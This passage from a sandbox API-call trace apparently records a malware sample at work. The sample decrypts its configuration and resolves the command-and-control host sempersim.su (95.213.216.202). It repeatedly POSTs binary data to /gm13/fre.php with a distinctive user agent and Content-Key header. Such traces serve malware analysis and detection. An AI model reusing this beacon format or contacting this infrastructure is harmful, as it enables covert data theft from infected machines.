lpSrch="https://") returned 0x0 [0273.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0273.510] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0273.511] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.511] GetProcessHeap () returned 0x620000 [0273.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0273.511] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0273.511] GetProcessHeap () returned 0x620000 [0273.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0273.512] GetProcessHeap () returned 0x620000 [0273.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6451e0 | out: hHeap=0x620000) returned 1 [0273.512] GetProcessHeap () returned 0x620000 [0273.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e10 | out: hHeap=0x620000) returned 1 [0273.513] GetProcessHeap () returned 0x620000 [0273.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ee8 [0273.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.513] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.522] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0273.528] GetProcessHeap () returned 0x620000 [0273.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0273.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.529] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0273.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.529] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.530] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.530] GetProcessHeap () returned 0x620000 [0273.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0273.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.531] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ee8, pdwDataLen=0x19fcfc | out: pbData=0x642ee8, pdwDataLen=0x19fcfc) returned 1 [0273.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.532] CryptDestroyKey (hKey=0x62d710) returned 1 [0273.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0273.533] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0273.533] GetProcessHeap () returned 0x620000 [0273.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ed0 [0273.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0273.534] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0273.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0273.535] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0273.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0273.536] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0273.536] GetProcessHeap () returned 0x620000 [0273.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0273.536] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0273.538] GetProcessHeap () returned 0x620000 [0273.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b500 [0273.538] socket (af=2, type=1, protocol=6) returned 0x40c [0273.538] connect (s=0x40c, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0273.593] FreeAddrInfoW (pAddrInfo=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0273.593] GetProcessHeap () returned 0x620000 [0273.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0273.593] GetProcessHeap () returned 0x620000 [0273.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0273.594] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0273.595] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0273.596] GetProcessHeap () returned 0x620000 [0273.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0273.596] GetProcessHeap () returned 0x620000 [0273.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0273.597] GetProcessHeap () returned 0x620000 [0273.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6433f8 [0273.597] GetProcessHeap () returned 0x620000 [0273.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0273.602] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0273.608] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0273.608] GetProcessHeap () returned 0x620000 [0273.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0273.608] GetProcessHeap () returned 0x620000 [0273.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0273.609] send (s=0x40c, buf=0x63a880*, len=237, flags=0) returned 237 [0273.611] send (s=0x40c, buf=0x6421e0*, len=159, flags=0) returned 159 [0273.611] GetProcessHeap () returned 0x620000 [0273.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0273.613] recv (in: s=0x40c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0275.463] GetProcessHeap () returned 0x620000 [0275.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0275.464] GetProcessHeap () returned 0x620000 [0275.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0275.465] GetProcessHeap () returned 0x620000 [0275.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0275.465] GetProcessHeap () returned 0x620000 [0275.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0275.465] closesocket (s=0x40c) returned 0 [0275.466] GetProcessHeap () returned 0x620000 [0275.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b500 | out: hHeap=0x620000) returned 1 [0275.466] GetProcessHeap () returned 0x620000 [0275.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ed0 | out: hHeap=0x620000) returned 1 [0275.467] GetProcessHeap () returned 0x620000 [0275.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0275.467] GetProcessHeap () returned 0x620000 [0275.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0275.467] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc3c) returned 0x40c [0275.470] Sleep (dwMilliseconds=0xea60) [0275.482] GetProcessHeap () returned 0x620000 [0275.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0275.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.483] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.494] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0275.506] GetProcessHeap () returned 0x620000 [0275.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0275.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.507] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0275.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.508] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.509] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.509] GetProcessHeap () returned 0x620000 [0275.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0275.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.514] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0275.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.516] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0275.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.517] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0275.517] GetProcessHeap () returned 0x620000 [0275.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0275.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0275.518] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0275.519] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0275.520] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0275.521] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.521] GetProcessHeap () returned 0x620000 [0275.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0275.521] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.521] GetProcessHeap () returned 0x620000 [0275.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0275.522] GetProcessHeap () returned 0x620000 [0275.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0275.522] GetProcessHeap () returned 0x620000 [0275.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0275.523] GetProcessHeap () returned 0x620000 [0275.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0275.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.524] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.532] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0275.553] GetProcessHeap () returned 0x620000 [0275.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0275.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.554] CryptImportKey (in: hProv=0x63ba90, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0275.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.555] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.556] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.556] GetProcessHeap () returned 0x620000 [0275.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0275.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.560] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0275.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.561] CryptDestroyKey (hKey=0x62d710) returned 1 [0275.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0275.562] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0275.562] GetProcessHeap () returned 0x620000 [0275.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646770 [0275.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0275.563] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0275.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0275.564] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0275.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0275.565] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0275.565] GetProcessHeap () returned 0x620000 [0275.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0275.565] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c398*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0275.569] GetProcessHeap () returned 0x620000 [0275.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b560 [0275.569] socket (af=2, type=1, protocol=6) returned 0x410 [0275.569] connect (s=0x410, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0275.626] FreeAddrInfoW (pAddrInfo=0x63c398*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0275.626] GetProcessHeap () returned 0x620000 [0275.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0275.626] GetProcessHeap () returned 0x620000 [0275.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0275.627] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0275.628] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0275.628] GetProcessHeap () returned 0x620000 [0275.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0275.628] GetProcessHeap () returned 0x620000 [0275.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0275.629] GetProcessHeap () returned 0x620000 [0275.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0275.629] GetProcessHeap () returned 0x620000 [0275.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0275.630] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0275.630] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0275.630] GetProcessHeap () returned 0x620000 [0275.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0275.631] GetProcessHeap () returned 0x620000 [0275.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0275.631] send (s=0x410, buf=0x63a880*, len=237, flags=0) returned 237 [0275.632] send (s=0x410, buf=0x6421e0*, len=159, flags=0) returned 159 [0275.632] GetProcessHeap () returned 0x620000 [0275.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0275.632] recv (in: s=0x410, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0277.451] GetProcessHeap () returned 0x620000 [0277.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0277.452] GetProcessHeap () returned 0x620000 [0277.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0277.452] GetProcessHeap () returned 0x620000 [0277.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0277.452] GetProcessHeap () returned 0x620000 [0277.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0277.453] closesocket (s=0x410) returned 0 [0277.453] GetProcessHeap () returned 0x620000 [0277.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b560 | out: hHeap=0x620000) returned 1 [0277.453] GetProcessHeap () returned 0x620000 [0277.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646770 | out: hHeap=0x620000) returned 1 [0277.454] GetProcessHeap () returned 0x620000 [0277.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0277.455] GetProcessHeap () returned 0x620000 [0277.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0277.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc40) returned 0x410 [0277.457] Sleep (dwMilliseconds=0xea60) [0277.464] GetProcessHeap () returned 0x620000 [0277.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643050 [0277.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.472] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0277.483] GetProcessHeap () returned 0x620000 [0277.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0277.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.484] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0277.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.485] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.486] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.486] GetProcessHeap () returned 0x620000 [0277.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0277.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.487] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643050, pdwDataLen=0x19fcfc | out: pbData=0x643050, pdwDataLen=0x19fcfc) returned 1 [0277.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.489] CryptDestroyKey (hKey=0x62d190) returned 1 [0277.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.490] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0277.490] GetProcessHeap () returned 0x620000 [0277.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646320 [0277.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0277.491] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0277.492] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0277.493] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0277.494] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.494] GetProcessHeap () returned 0x620000 [0277.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0277.494] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.494] GetProcessHeap () returned 0x620000 [0277.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0277.497] GetProcessHeap () returned 0x620000 [0277.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646320 | out: hHeap=0x620000) returned 1 [0277.498] GetProcessHeap () returned 0x620000 [0277.498] HeapFree 